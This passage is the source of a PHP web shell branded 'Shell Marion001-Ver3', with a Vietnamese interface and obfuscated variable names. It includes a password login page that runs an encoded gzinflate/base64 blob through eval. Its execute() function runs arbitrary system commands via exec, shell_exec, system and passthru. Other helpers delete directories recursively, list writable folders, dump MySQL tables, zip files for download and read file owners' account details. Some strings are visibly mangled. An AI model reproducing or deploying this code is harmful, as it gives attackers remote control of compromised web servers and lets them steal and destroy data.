  2295. if (c < 128) {string += String.fromCharCode(c);
  2296. i++;
  2297. }\nelse if((c > 191) && (c < 224)) {c2 = utftext.charCodeAt(i+1);
  2298. string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
  2299. i += 2;
  2300. }\nelse {c2 = utftext.charCodeAt(i+1);
  2301. c3 = utftext.charCodeAt(i+2);
  2302. string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
  2303. i += 3;
  2304. }}\nreturn string;
  2305. }}\nfunction encrypt(){document.getElementById('resulttext').innerHTML='K&#7871;
  2306. t Qu&#7843;
  2307. M&#227;
  2308. H&#243;
  2309. a Base64:';
  2310. document.sinhvienit.T2.value=Base64.encode(document.sinhvienit.T1.value);
  2311. return false;
  2312. }\nfunction decrypt(){document.getElementById('resulttext').innerHTML='K&#7871;
  2313. t Qu&#7843;
  2314. Gi&#7843;
  2315. i M&#227;
  2316. Base64:';
  2317. document.sinhvienit.T2.value=Base64.decode(document.sinhvienit.T1.value);
  2318. return false;
  2319. }\n</script><form method="POST" name="sinhvienit" onsubmit="return encrypt();
  2320. " style=\"width:610px;
  2321. "><textarea name=\"T1\" onchange=\"encrypt()\" class="textarea" placeholder=\"D&#225;
  2322. n N&#7897;
  2323. i Dung C&#7847;
  2324. n M&#227;
  2325. H&#243;
  2326. a, Gi&#7843;
  2327. i M&#227;
  2328. Base64" style=\"margin: 2px;
  2329. width: 970px;
  2330. height: 35px;
  2331. \"></textarea>\n<div id="resulttext" style="font-weight:bold"></div>\t<textarea name=\"T2" onchange="encrypt()\" class="textarea\" placeholder=\"K&#7871;
  2332. t Qu&#7843;
  2333. M&#227;
  2334. H&#243;
  2335. a, Gi&#7843;
  2336. i M&#195;
  2337. Base64" style="margin: 2px;
  2338. width: 970px;
  2339. height: 35px;
  2340. "></textarea>\t\n<input type=\"button\" value="M&#227;
  2341. H&#243;
  2342. a Base64" class="button" onclick="encrypt()"><input type=\"button" value=\"Gi&#7843;
  2343. i M&#227;
  2344. Base64" class="button\" onclick="decrypt()\"> | \n<input type="button\" value=\"M&#227;
  2345. H&#243;
  2346. a URL\" class=\"button\" onclick=\"encrypthtml()\"><input type="button" value="Gi&#7843;
  2347. i M&#227;
  2348. URL" class=\"button\" onclick="decrypthtml()\"></form><script type=\"text/javascript\">\nfunction encode(str) {return encodeURIComponent(str);
  2349. }function decode(str) {return  decodeURIComponent(str.replace(/\+/g,  " \"));
  2350. }function encrypthtml()\n{document.getElementById('resulttexthtml').innerHTML='K&#7871;
  2351. t qu&#7843;
  2352. m&#227;
  2353. h&#243;
  2354. a URL:';
  2355. document.htmlencode.htmlT2.value=encode(document.htmlencode.htmlT1.value);
  2356. return false;
  2357. }function decrypthtml()\n{document.getElementById('resulttexthtml').innerHTML='K&#7871;
  2358. t qu&#7843;
  2359. gi&#7843;
  2360. i m&#227;
  2361. URL:';
  2362. document.htmlencode.htmlT2.value=decode(document.htmlencode.htmlT1.value);
  2363. return false;
  2364. }\n</script><form method=\"POST" name=\"htmlencode\" onsubmit="return encrypthtml();
  2365. \" style=\"width:610px;
  2366. ">\n<textarea name=\"htmlT1" onChange=\"encrypthtml()" class="textarea" placeholder="D&#225;
  2367. n URL V&#224;
  2368. o &#272;
  2369. &#226;
  2370. y\" style="margin: 2px;
  2371. width: 970px;
  2372. height: 25px;
  2373. "></textarea><div id="resulttexthtml\" style=\"font-weight:bold\"></div>\n<textarea name=\"htmlT2" onChange=\"encrypthtml()\" class=\"textarea" placeholder=\"K&#7871;
  2374. t Q&#7911;
  2375. a" style="margin: 2px;
  2376. width: 970px;
  2377. height: 25px;
  2378. \"></textarea><br></form>\n<div class=\"clear\"><!--reseverip-->";
  2379. ob_start();
  2380. @set_time_limit(0);
  2381. echo"<p align='center'>";
  2382. echo"<center><form><input size='60' value='' placeholder='Resever ip By: Marion001' name='marionip' /><input type='submit' value='Resever IP'></form></center><br/>";
  2383. if(isset($_GET["marionip"])){${site}=$_GET["marionip"];
  2384. ${marionip}="http://domains.yougetsignal.com/domains.php";
  2385. ${ch}=curl_init(${"marionip"});
  2386. curl_setopt(${ch},CURLOPT_RETURNTRANSFER,1);
  2387. curl_setopt(${"ch"},CURLOPT_POSTFIELDS,"remoteAddress=$site&ket=");
  2388. curl_setopt(${"ch"},CURLOPT_HEADER,0);
  2389. curl_setopt(${ch},CURLOPT_POST,1);
  2390. ${resp}=curl_exec(${"ch"});
  2391. ${resp}=str_replace("[","",str_replace("]","",str_replace("\""","",str_replace(", ,",",",str_replace("{","",str_replace("{","",str_replace("}","",str_replace(", ",",",str_replace(", ",",",str_replace("'","",str_replace("'","",str_replace(":",",",str_replace(""","",${resp})))))))))))));
  2392. ${array}=explode(",,",${resp});
  2393. unset(${array}[0]);
  2394. echo"<table class=tbl>";
  2395. foreach(${array} as${lnk}){print"<tr><td><a href='$lnk' target=_blank>$lnk</a></td></tr>";
  2396. }echo"</table>";
  2397. curl_close(${ch});
  2398. }echo "<!--end reseverip-->\n<!-- End Tool --></div></div><!-- End hidden tool --><span style="float:right;
  2399. \"><b><a href=\"#top" title="Top\">L&#234;
  2400. n Tr&#234;
  2401. n</a></b></span>";
  2402. function m($msg){echo"<div style="background:;
  2403. border:1px solid #D6C612;
  2404. padding:15px;
  2405. font:14px;
  2406. text-align:center;
  2407. font-weight:bold;
  2408. \">";
  2409. echo${msg};
  2410. echo"</div>";
  2411. }function scookie($key,$value,$life=0,$prefix=1){global$MarionAdmin,$timestamp,$_SERVER;
  2412. ${key}=(${prefix}?${MarionAdmin}["cookiepre"]:"").${key};
  2413. ${life}=${life}?${life}:${MarionAdmin}["cookielife"];
  2414. ${"useport"}=$_SERVER["SERVER_PORT"]==443?1:0;
  2415. setcookie(${"key"},${"value"},${"timestamp"}+${life},${MarionAdmin}["cookiepath"],${"MarionAdmin"}["cookiedomain"],${"useport"});
  2416. }function multi($num,$perpage,$curpage,$tablename){${multipage}="";
  2417. if(${num}>${perpage}){;
  2418. ${page}=10;
  2419. ${offset}=5;
  2420. ${pages}=@ceil(${num}/${perpage});
  2421. if(${"page"}>${pages}){${from}=1;
  2422. ${to}=${pages};
  2423. }else{$vxvuvmiywqer="page";
  2424. ${from}=${curpage}-${offset};
  2425. ${to}=${curpage}+${$vxvuvmiywqer}-${offset}-1;
  2426. if(${from}<1){$almeailis="from";
  2427. ${to}=${curpage}+1-${$almeailis};
  2428. ${from}=1;
  2429. if((${to}-${"from"})<${page}&&(${to}-${from})<${pages}){$rddalzatw="page";
  2430. ${to}=${$rddalzatw};
  2431. }}elseif(${to}>${pages}){;
  2432. ${"from"}=${curpage}-${pages}+${to};
  2433. ${to}=${pages};
  2434. if((${to}-${from})<${page}&&(${"to"}-${"from"})<${pages}){${from}=${pages}-${page}+1;
  2435. }}}${multipage}=(${curpage}-${"offset"}>1&&${pages}>${page}?"<a href="javascript:settable('".${tablename}."', '', 1);
  2436. \">First</a> ":"").(${"curpage"}>1?"<a href="javascript:settable('".${"tablename"}."', '', ".(${curpage}-1).");
  2437. \">Prev</a> ":"");
  2438. for(${i}=${from};
  2439. ${"i"}<=${to};
  2440. ${i}++){$umjhurx="i";
  2441. ${multipage}.=${i}==${"curpage"}?${i}." ":"<a href="javascript:settable('".${tablename}."', '', ".${i}.");
  2442. ">[".${$umjhurx}."]</a> ";
  2443. }${multipage}.=(${curpage}<${pages}?"<a href=\"javascript:settable('".${"tablename"}."', '', ".(${curpage}+1).");
  2444. ">Next</a>":"").(${"to"}<${pages}?" <a href="javascript:settable('".${tablename}."', '', ".${pages}.");
  2445. ">Last</a>":"");
  2446. ${multipage}=${multipage}?"<p>Pages: ".${multipage}."</p>":"";
  2447. }return${multipage};
  2448. }function loginmarion(){echo "<html><script type=\"text/javascript\">document.write('<head><body bgcolor=black background=black><meta http-equiv=\"Content-Type\" content=\"text/html;
  2449. charset=UTF-8\" /><title>..:Marion001 :..</title><style type="text/css\">A:link {text-decoration: none;
  2450. color: green }A:visited {text-decoration: none;
  2451. color:red}A:active {text-decoration: none}A:hover {text-decoration: underline;
  2452. color: green;
  2453. }input, textarea, button{font-size: 11pt;
  2454. color: #00FF51;
  2455. font-family: verdana, sans-serif;
  2456. background-color: #000000;
  2457. }</style><BR><BR><div align=center ><fieldset style="border: 1px solid rgb(20, 255, 0);
  2458. padding: 4px;
  2459. width:450px;
  2460. bgcolor:white;
  2461. align:center;
  2462. font-family:tahoma;
  2463. font-size:10pt\"><legend><font color=IndianRed1><B>Shell Marion001-Ver3</b></font></legend><div><font color=#EEEE00><font color=#33ff00>==[ <B>Marion001</B> ]== </font><BR><BR><form method=\"POST" action=""><span style="font:10pt tahoma;
  2464. \">Vi&#7871;
  2465. t M&#7853;
  2466. t Kh&#7849;
  2467. u: </span><input name=\"password" type="password" size="20" title="Nh&#7853;
  2468. p M&#7853;
  2469. t Kh&#7849;
  2470. u\"><input type="hidden\" name="doing" value=\"login"><input type=\"submit" value=\"Marion001\" title="&#272;
  2471. &#259;
  2472. ng nh&#7853;
  2473. p\"><a href=\"U2hlbGwgTWFyaW9uMDAxCmZhY2Vib29rLmNvbS9QYXJ0eS5NYXJpb24wMDE="></a></form><BR><B><font color=#FFFFFF><a href=https://www.facebook.com/Party.Marion002 target=_blank>Developed by Marion001</a><BR></b></div></fieldset><font face=\"Orbitron" style="color:white;
  2474. text-shadow: 0 0 0.3em MediumBlue,0 0 0.3em MediumBlue;
  2475. z-index:900000\"></a><style>HTML,BODY{cursor: url("http://downloads.totallyfreecursors.com/thumbnails/mchiller.ani"), url("http://downloads.totallyfreecursors.com/thumbnails/mchiller.gif"), auto;
  2476. }</style><br><h2><font face="Orbitron" style=\"color:rgb(0, 255, 178);
  2477. \"><br></head>')</script>\n<center><script src="https://apis.google.com/js/platform.js"></script><div class=\"g-ytsubscribe" data-channelid=\"UCAapAGA3TQ-BJot0fX9f6fQ" data-layout="full\" data-count=\"default"></div><br/><br/><iframe src=\"https://www.facebook.com/plugins/like.php?href=https://www.facebook.com/Party.Marion002&amp;
  2478. send=false&amp;
  2479. layout=standard&amp;
  2480. width=400&amp;
  2481. show_faces=false&amp;
  2482. action=like&amp;
  2483. colorscheme=light&amp;
  2484. font=arial&amp;
  2485. height=35" scrolling="no" frameborder="0\" style=\"border:none;
  2486. overflow:hidden;
  2487. width:350px;
  2488. height:20px;
  2489. \" allowtransparency="true"></iframe><iframe width="146\" height="28" src=\"http://www.hit-counts.com/counter.php?t=MTM0MjE2NQ==" frameborder=\"0" allowfullscreen=\"true\"></iframe></center></html>\n";
  2490. ${Funtiontool}="fVdtU9paEP5+Z+5/oLlOR2iVkFfwrdWrtXdGq1XaL+IwgSSQCkkIoNAO//3uc/ackCDjh2hIztl9dvfZ52wqO3+0y6vOwgrpMk7pT/9eWz1onYVjdBZugy6XLosuM6aHPbqadDna4zEtsgK6D6POwsZ+rLLpAR662iFMwyCsn9GfBvmxTbbueuMe23Zop4OdFpu0Ddru6vSQNrotYYY2u7B08wpk8Bu+JKi+vCdrji2fAbBDlwfrbbppwbzdZbiOndsvJ0EhTRH4khb62DVkZK7JKXEaCjI73IL6Kg++aJUzC3yum0qbunwIW81MpteHE4BmwyLLyG7TQ+yl3Cj4W3w58nJH0qk9KJaP7VvWvFy67dCjLAtGqB+nATs5bLYoKorcG2RkmE1m/Zfn8WC5jF6H072UdGkV/G2PwHFiZHwCtAE7Ysfa4ecojrrTYLarJXNJVF3cdAECIdEW+m1E8UD7qFcPd9IkDWejfhi/cAoSFT/gxHn8m3kt0QLRN4eSWopquDxRfWYFGNIa8wLbgSsyPIp+9abLIS+ImFjFBet4/EgyTR95S669Y2dZkk05jm20lW3hmhl8z5LoOYx+ycpYEqKst+NGshqAFYaL5cvkaVFmxflmQ7/lFLZclQeRl+FwnZHV8Qd3beAtwk6zSKKVSMFdx4m4iVfHg7HvzQLKT31cpz2tCm1uHmDpAWVmFo2D3eoH09H12i75k/lefeBNnYWpa9VqtRDLTc5xEUjI8RLbkgDudrr3F3c/L+4etDtaY18zbNu66MptFl+2oT1uydAWMrcyVMcWXTQtt1DR3dc2yZWtkxsb/DAv4EM4haraqFO75PKm6E8xwXmWTdkfymK65GaftHAopLvC5XBaQlEOKjuzYRINIi/W9rVO1hH/FlbrtrMw9G8DaQKKb+g5Owa0LUrVBkZ0KfNa1Pw1loIOAUvugRYLAekd4Je2PwgIznTWW8YelXWdG/xHEu6UJoKI/oX2WN3X1sDbYJITDCvnUARw3p4R1JegV8S61gMJpR/FT3tAEigYRccs96JdbVWRAJFek3t4Xy/mpZb9HSXERpNVwQ5/yFct3rIGo/oQUM7QU30+wywLMhVmlR8p8pegWtZBZSblJwijEYEwArxtpp/qtXdnsrvNJ3nUhUlWo4Yx/d131XqNFjeusSSTciB4r6M/GrysVmKA4fWFoSTJQBkzGUPZGrEvUiRwxLLvWzhm7P1UFlkHGjJow3bx2gWGKmUCwmELkUaZavVd2vDv9XmtfoxqBLDbLCapeK6sigcLqXwSwzTsN/ZELaV89ZD+oUxXnxBab9Arb7efqso5z64lySTL86lEcP1+83BH+OKAn/TQfgY6XBtzpJhzHN8r5V9gR/9CD1yR4Yj7xQj6yVgrK+i2hqeJaADvo4G/OQX9Et5VtjJKFZd7j/XJacVPlTJ9rWa7fYvQv0rVEwQWnN3UndO80X/LQ814Pd+R+y8IHlxm4uxce9GoezkXglJRo1Q6WoJkMjmJYCaX9CoSUyh1sdpISJ6S5fz5ZT5fbM40PJXO6eQvlOv1ONqbqDF3umaLGnMJ8863JDoXVj6PyevulnMwtzUpzXXppDDRrT5uPf9OCxIpTh6PC/j2MCuM5YFvmL45O825qObV1niuGnK6Hl9X1cMoJOZfXrQfNFYFbnZ4O1eqQRPEscbtSq157QldDWOuCbVpTav+CfrDRDuSAEOmuONXxPwDeWgmPlSlo90i8HtWQsOoKAWDVM2AMw3EOnonEPclWHFKetmsTojGe3Sac8sbBp8brHVqrVABYeMTB3Xm5UIqggI+Ar6OSQlITjhuRQQHMydHokFSPvLgBE5da5kGx3gfijYNVESIpiFCP2aIYpeOmoYeF1XMc0V54kim0W+OH6MKfLDBFm/imMJcZMWq4EhakZNvRc7BLYkNBJhLHvoyk5byB+Vjf+Jwj9TzZ280L+CHzqgUF9KYqeUnZKNf36w+wGkgWDTFSLvTvb25bwueu8IZSWn1zzh5DrrzdJR4fuB3cZDRwi//XV3cC/5y4hLpvpy4J+3xQY22fipfBXKp0D/t8WPJWOH07JbyD0sxnvs09VUPBZsRE/eM2Thpv6c4KXoTM65p4a7HyTT0L+qbBgTQr97/Q9GbJurVi+VYY5H+G84/yJZpHcZDfgwz9BSltsQLNWxD8I/qQ3jmJK5WgFTRjtIsOCl99iCsmWx0e9aVymsXvnzyCR7fDZsfGKmcxxriGyMQs6koIH9m3C+ns2C8VojSSa7LM/z7XH4Arw9wqSQmjnGVUEJfTyU37BMc5n//9emk8j8=";
  2491. eval(gzinflate(base64_decode(${Funtiontool})));
  2492. exit;
  2493. }function execute($cfe){${res}="";
  2494. if(${cfe}){;
  2495. if(function_exists("exec")){$lxtzowsivov="res";
  2496. @exec(${cfe},${res});
  2497. ${res}=join("",${$lxtzowsivov});
  2498. }elseif(function_exists("shell_exec")){${res}=@shell_exec(${cfe});
  2499. }elseif(function_exists("system")){@ob_start();
  2500. @system(${"cfe"});
  2501. ${res}=@ob_get_contents();
  2502. @ob_end_clean();
  2503. }elseif(function_exists("passthru")){$vleqckfhh="cfe";
  2504. @ob_start();
  2505. @passthru(${$vleqckfhh});
  2506. ${res}=@ob_get_contents();
  2507. @ob_end_clean();
  2508. }elseif(@is_resource(${res=@popen(${cfe},"r"))){;
  2509. ${res}="";
  2510. while(!@feof(${"f"})){$srcamycfiyx="res";
  2511. ${$srcamycfiyx}.=@fread(${"f"},1024);
  2512. }@pclose(${f});
  2513. }}return${res};
  2514. }function which($pr){$jjoafwcvqfgn="path";
  2515. ${$jjoafwcvqfgn}=execute("which $pr");
  2516. return(${path}?${path}:${pr});
  2517. }function cf($fname,$text){if(${fp}=@fopen(${fname},"w")){$vzfvvhmthx="fp";
  2518. @fputs(${$vzfvvhmthx},@base64_decode(${text}));
  2519. @fclose(${fp});
  2520. }}function debuginfo(){$pjrshr="totaltime";
  2521. global$starttime;
  2522. ${mtime}=explode(" ",microtime());
  2523. ${$pjrshr}=number_format((${mtime}[1]+${mtime}[0]-${starttime}),6);
  2524. echo"<span style="float:right;
  2525. ">X&#7917;
  2526. L&#253;
  2527. Trong ".${"totaltime"}." Gi&#226;
  2528. y(s)</span>";
  2529. }function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306'){$kfhnngvlctgn="dbuser";
  2530. if(!${link}=@mysql_connect(${dbhost}.":".${dbport},${$kfhnngvlctgn},${dbpass})){p("<h2>L&#7895;
  2531. i, Kh&#244;
  2532. ng Th&#7875;
  2533. K&#7871;
  2534. t N&#7889;
  2535. i T&#7899;
  2536. i M&#225;
  2537. y Ch&#7911;
  2538. MySQL</h2>");
  2539. exit;
  2540. }$masgvsxmx="dbname";
  2541. if(${link}&&${$masgvsxmx}){$xugwuqijst="dbname";
  2542. if(!@mysql_select_db(${$xugwuqijst},${link})){p("<h2>Database &#272;
  2543. &#432;
  2544. &#7907;
  2545. c L&#7921;
  2546. a Ch&#7885;
  2547. n C&#211;
  2548. L&#7895;
  2549. i</h2>");
  2550. exit;
  2551. }}if(${link}&&mysql_get_server_info()>"4.1"){if(in_array(strtolower(${charset}),array("gbk","big5","utf8"))){;
  2552. q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;
  2553. ",${link});
  2554. }}return${link};
  2555. }function s_array(&$array){if(is_array(${array})){$esvbtixpkser="v";
  2556. foreach(${array} as${"k"}=>${$esvbtixpkser}){$ygfnzlwcse="k";
  2557. ${array}[${$ygfnzlwcse}]=s_array(${"v"});
  2558. }}else if(is_string(${array})){;
  2559. ${array}=stripslashes(${array});
  2560. }return${array};
  2561. }function html_clean($content){${content}=htmlspecialchars(${content});
  2562. ${content}=str_replace("\n","<br />",${content});
  2563. ${content}=str_replace("  ","&nbsp;
  2564. &nbsp;
  2565. ",${content});
  2566. ${content}=str_replace("\t","&nbsp;
  2567. &nbsp;
  2568. &nbsp;
  2569. &nbsp;
  2570. ",${content});
  2571. return${content};
  2572. }function getChmod($filepath){return substr(base_convert(@fileperms(${filepath}),10,8),-4);
  2573. }function getPerms($filepath){$komsrulxm="filepath";
  2574. ${mode}=@fileperms(${$komsrulxm});
  2575. if((${mode}&0xC000)===0xC000){${type}="s";
  2576. }elseif((${mode}&0x4000)===0x4000){$jfqkbub="type";
  2577. ${$jfqkbub}="d";
  2578. }elseif((${mode}&0xA000)===0xA000){${type}="l";
  2579. }elseif((${mode}&0x8000)===0x8000){;
  2580. ${type}="-";
  2581. }elseif((${mode}&0x6000)===0x6000){$tuqvrke="type";
  2582. ${$tuqvrke}="b";
  2583. }elseif((${"mode"}&0x2000)===0x2000){${type}="c";
  2584. }elseif((${mode}&0x1000)===0x1000){${type}="p";
  2585. }else{${type}="?";
  2586. }${owner}["read"]=(${mode}&00400)?"r":"-";
  2587. ${owner}["write"]=(${"mode"}&00200)?"w":"-";
  2588. ${owner}["execute"]=(${mode}&00100)?"x":"-";
  2589. ${group}["read"]=(${mode}&00040)?"r":"-";
  2590. ${group}["write"]=(${mode}&00020)?"w":"-";
  2591. ${"group"}["execute"]=(${mode}&00010)?"x":"-";
  2592. ${world}["read"]=(${mode}&00004)?"r":"-";
  2593. ${world}["write"]=(${"mode"}&00002)?"w":"-";
  2594. ${world}["execute"]=(${mode}&00001)?"x":"-";
  2595. if(${"mode"}&0x800){${owner}["execute"]=(${owner}["execute"]=="x")?"s":"S";
  2596. }if(${mode}&0x400){;
  2597. ${group}["execute"]=(${group}["execute"]=="x")?"s":"S";
  2598. }if(${mode}&0x200){$xfwllipvrd="world";
  2599. ${world}["execute"]=(${$xfwllipvrd}["execute"]=="x")?"t":"T";
  2600. }return${type}.${owner}["read"].${"owner"}["write"].${"owner"}["execute"].${"group"}["read"].${group}["write"].${group}["execute"].${world}["read"].${world}["write"].${world}["execute"];
  2601. }function getUser($filepath){if(function_exists("posix_getpwuid")){${array}=@posix_getpwuid(@fileowner(${filepath}));
  2602. if(${array}&&is_array(${array})){$cdveylgnk="array";
  2603. return" / <a href=\"#\" title="T&#234;
  2604. n: ".${array}["name"]."&#13&#10Passwd: ".${array}["passwd"]."&#13&#10Uid: ".${array}["uid"]."&#13&#10gid: ".${"array"}["gid"]."&#13&#10Gecos: ".${array}["gecos"]."&#13&#10Dir: ".${"array"}["dir"]."&#13&#10Shell: ".${$cdveylgnk}["shell"]."\">".${array}["name"]."</a>";
  2605. }}return"";
  2606. }function deltree($deldir){$vtimex="deldir";
  2607. ${mydir}=@dir(${$vtimex});
  2608. while(${file}=$mydir->read()){$tvwgdee="file";
  2609. if((is_dir(${deldir}."/".${$tvwgdee}))&&(${file}!=".")&&(${file}!="..")){;
  2610. @chmod(${deldir}."/".${file},0777);
  2611. deltree(${deldir}."/".${file});
  2612. }if(is_file(${deldir}."/".${"file"})){;
  2613. @chmod(${deldir}."/".${file},0777);
  2614. @unlink(${"deldir"}."/".${file});
  2615. }}$mydir->close();
  2616. @chmod(${deldir},0777);
  2617. return@rmdir(${deldir})?1:0;
  2618. }function bg(){global$bgc;
  2619. return(${bgc}++%2==0)?"alt1":"alt2";
  2620. }function getPath($scriptpath,$nowpath){if(${nowpath}=="."){${nowpath}=${scriptpath};
  2621. }${nowpath}=str_replace("\\","/",${nowpath});
  2622. ${nowpath}=str_replace("//","/",${nowpath});
  2623. if(substr(${nowpath},-1)!="/"){;
  2624. ${nowpath}=${nowpath}."/";
  2625. }return${nowpath};
  2626. }function getUpPath($nowpath){$goyddym="uppath";
  2627. ${pathdb}=explode("/",${"nowpath"});
  2628. ${num}=count(${pathdb});
  2629. if(${num}>2){unset(${pathdb}[${num}-1],${pathdb}[${num}-2]);
  2630. }${uppath}=implode("/",${pathdb})."/";
  2631. ${uppath}=str_replace("//","/",${$goyddym});
  2632. return${uppath};
  2633. }function getcfg($varname){$sacguiwphfhb="result";
  2634. ${$sacguiwphfhb}=get_cfg_var(${varname});
  2635. if(${result}==0){return"No";
  2636. }elseif(${"result"}==1){return"Yes";
  2637. }else{return${result};
  2638. }}function getfun($funName){return(false!==function_exists(${funName}))?"Yes":"No";
  2639. }function GetList($dir){global$dirdata,$j,$nowpath;
  2640. !${"j"}&&${j}=1;
  2641. if(${dh}=opendir(${dir})){;
  2642. while(${file}=readdir(${dh})){$qsisnvs="f";
  2643. ${$qsisnvs}=str_replace("//","/",${dir}."/".${file});
  2644. if(${file}!="."&&${file}!=".."&&is_dir(${f})){$xgukrrmcctu="f";
  2645. if(is_writable(${f})){$gksgyugeb="j";
  2646. ${dirdata}[${j}]["filename"]=str_replace(${"nowpath"},"",${f});
  2647. ${dirdata}[${$gksgyugeb}]["mtime"]=@date("Y-m-d H:i:s",filemtime(${f}));
  2648. ${dirdata}[${j}]["dirchmod"]=getChmod(${f});
  2649. ${dirdata}[${j}]["dirperm"]=getPerms(${"f"});
  2650. ${dirdata}[${"j"}]["dirlink"]=ue(${dir});
  2651. ${dirdata}[${j}]["server_link"]=${f};
  2652. ${dirdata}[${j}]["client_link"]=ue(${f});
  2653. ${j}++;
  2654. }GetList(${$xgukrrmcctu});
  2655. }}closedir(${dh});
  2656. clearstatcache();
  2657. return${dirdata};
  2658. }else{return array();
  2659. }}function qy($sql){$znnfrltqbh="res";
  2660. ${"res"}=${error}="";
  2661. if(!${res}=@mysql_query(${sql})){return 0;
  2662. }else if(is_resource(${$znnfrltqbh})){return 1;
  2663. }else{return 2;
  2664. }return 0;
  2665. }function q($sql){return@mysql_query(${sql});
  2666. }function fr($qy){mysql_free_result(${qy});
  2667. }function sizecount($size){$fovfwuy="size";
  2668. if(${size}>1073741824){;
  2669. ${size}=round(${size}/1073741824*100)/100 ." G";
  2670. }elseif(${$fovfwuy}>1048576){$moglxnkvnwo="size";
  2671. ${size}=round(${$moglxnkvnwo}/1048576*100)/100 ." M";
  2672. }elseif(${size}>1024){$ctegxdeqso="size";
  2673. ${$ctegxdeqso}=round(${size}/1024*100)/100 ." K";
  2674. }else{${size}=${size}." B";
  2675. }return${size};
  2676. }class PHPZip{var$out='';
  2677. function PHPZip($dir){if(@function_exists("gzcompress")){$ppjsinvqf="curdir";
  2678. ${$ppjsinvqf}=getcwd();
  2679. if(is_array(${dir}))${"filelist"}=${dir};
  2680. else{$clbpqiuiwif="k";
  2681. ${filelist}=$this->GetFileList(${"dir"});
  2682. foreach(${filelist} as${$clbpqiuiwif}=>${v})${filelist}[]=substr(${v},strlen(${dir})+1);
  2683. }if((!empty(${dir}))&&(!is_array(${dir}))&&(file_exists(${dir})))chdir(${dir});
  2684. else chdir(${"curdir"});
  2685. if(count(${filelist})>0){$ztoumanqv="filename";
  2686. foreach(${"filelist"} as${$ztoumanqv}){$oyldbkbuu="filename";
  2687. if(is_file(${$oyldbkbuu})){$qqfokohptz="content";
  2688. ${fd}=fopen(${filename},"r");
  2689. ${$qqfokohptz}=@fread(${fd},filesize(${filename}));
  2690. fclose(${fd});
  2691. if(is_array(${dir}))${"filename"}=basename(${filename});
  2692. $this->addFile(${content},${filename});
  2693. }}$this->out=$this->file();
  2694. chdir(${curdir});
  2695. }return 1;
  2696. }else return 0;
  2697. }function GetFileList($dir){$qwcdstltkmu="a";
  2698. static$a;
  2699. if(is_dir(${dir})){;
  2700. if(${dh}=opendir(${dir})){$mnwlkkdhbbt="dh";
  2701. while(${file}=readdir(${$mnwlkkdhbbt})){$gphbsxnvhs="file";
  2702. if(${$gphbsxnvhs}!="."&&${"file"}!=".."){$dcswpchkvb="f";
  2703. ${f}=${dir}."/".${file};
  2704. if(is_dir(${f}))$this->GetFileList(${f});
  2705. ${a}[]=${$dcswpchkvb};
  2706. }}closedir(${dh});
  2707. }}return${$qwcdstltkmu};
  2708. }var$datasec=array();
  2709. var$ctrl_dir=array();
  2710. var$eof_ctrl_dir="\50\4b\05\06\00\00\00\00";
  2711. var$old_offset=0;
  2712. function unix2DosTime($unixtime=0){$vhymdovnvbmm="timearray";
  2713. ${timearray}=(${unixtime}==0)?getdate():getdate(${unixtime});
  2714. if(${"timearray"}["year"]<1980){$lillyil="timearray";
  2715. ${timearray}["year"]=1980;
  2716. ${timearray}["mon"]=1;
  2717. ${timearray}["mday"]=1;
  2718. ${$lillyil}["hours"]=0;
  2719. ${timearray}["minutes"]=0;
  2720. ${timearray}["seconds"]=0;
  2721. }return((${timearray}["year"]-1980)<<25)|(${timearray}["mon"]<<21)|(${timearray}["mday"]<<16)|(${timearray}["hours"]<<11)|(${$vhymdovnvbmm}["minutes"]<<5)|(${timearray}["seconds"]>>1);
  2722. }function addFile($data,$name,$time=0){$ddbobdj="dtime";
  2723. ${name}=str_replace("\","/",${name});
  2724. ${dtime}=dechex($this->unix2DosTime(${time}));
  2725. ${hexdtime}="\\x".${dtime}[6].${dtime}[7]."\x".${$ddbobdj}[4].${"dtime"}[5]."\\x".${dtime}[2].${dtime}[3]."\\x".${dtime}[0].${"dtime"}[1];
  2726. eval("\$hexdtime = \"".${hexdtime}."\";
  2727. ");
  2728. ${fr}="PK";
  2729. ${fr}.=" ";
  2730. ${fr}.="  ";
  2731. ${fr}.=" ";
  2732. ${fr}.=${hexdtime};
  2733. ${unc_len}=strlen(${data});
  2734. ${"crc"}=crc32(${data});
  2735. ${zdata}=gzcompress(${"data"});
  2736. ${c_len}=strlen(${zdata});
  2737. ${zdata}=substr(substr(${zdata},0,strlen(${zdata})-4),2);
  2738. ${"fr"}.=pack("V",${crc});
  2739. ${fr}.=pack("V",${c_len});
  2740. ${fr}.=pack("V",${unc_len});
  2741. ${fr}.=pack("v",strlen(${name}));
  2742. ${fr}.=pack("v",0);
  2743. ${fr}.=${name};
  2744. ${fr}.=${zdata};
  2745. ${fr}.=pack("V",${crc});
  2746. ${fr}.=pack("V",${c_len});
  2747. ${fr}.=pack("V",${"unc_len"});
  2748. $this->datasec[]=${fr};
  2749. ${new_offset}=strlen(implode("",$this->datasec));
  2750. ${cdrec}="PK";
  2751. ${cdrec}.="  ";
  2752. ${cdrec}.=" ";
  2753. ${cdrec}.="  ";
  2754. ${cdrec}.=" ";
  2755. ${cdrec}.=${hexdtime};
  2756. ${cdrec}.=pack("V",${crc});
  2757. ${cdrec}.=pack("V",${"c_len"});
  2758. ${"cdrec"}.=pack("V",${unc_len});
  2759. ${cdrec}.=pack("v",strlen(${name}));
  2760. ${cdrec}.=pack("v",0);
  2761. ${cdrec}.=pack("v",0);
  2762. ${cdrec}.=pack("v",0);
  2763. ${cdrec}.=pack("v",0);
  2764. ${cdrec}.=pack("V",32);
  2765. ${cdrec}.=pack("V",$this->old_offset);
  2766. $this->old_offset=${new_offset};
  2767. ${cdrec}.=${name};
  2768. $this->ctrl_dir[]=${cdrec};
  2769. }function file(){$tdqycyiwczh="data";
  2770. ${data}=implode("",$this->datasec);
  2771. ${ctrldir}=implode("",$this->ctrl_dir);
  2772. return${data}.${ctrldir}.$this->eof_ctrl_dir.pack("v",sizeof($this->ctrl_dir)).pack("v",sizeof($this->ctrl_dir)).pack("V",strlen(${ctrldir})).pack("V",strlen(${$tdqycyiwczh}))."\00\00";
  2773. }}function sqldumptable($table,$fp=0){$eltwwvx="keys";
  2774. ${tabledump}="DROP TABLE IF EXISTS $table;
  2775. ";
  2776. ${tabledump}.="CREATE TABLE $table (";
  2777. ${firstfield}=1;
  2778. ${"fields"}=q("SHOW FIELDS FROM $table");
  2779. while(${field}=mysql_fetch_array(${fields})){$mwrymttnc="tabledump";
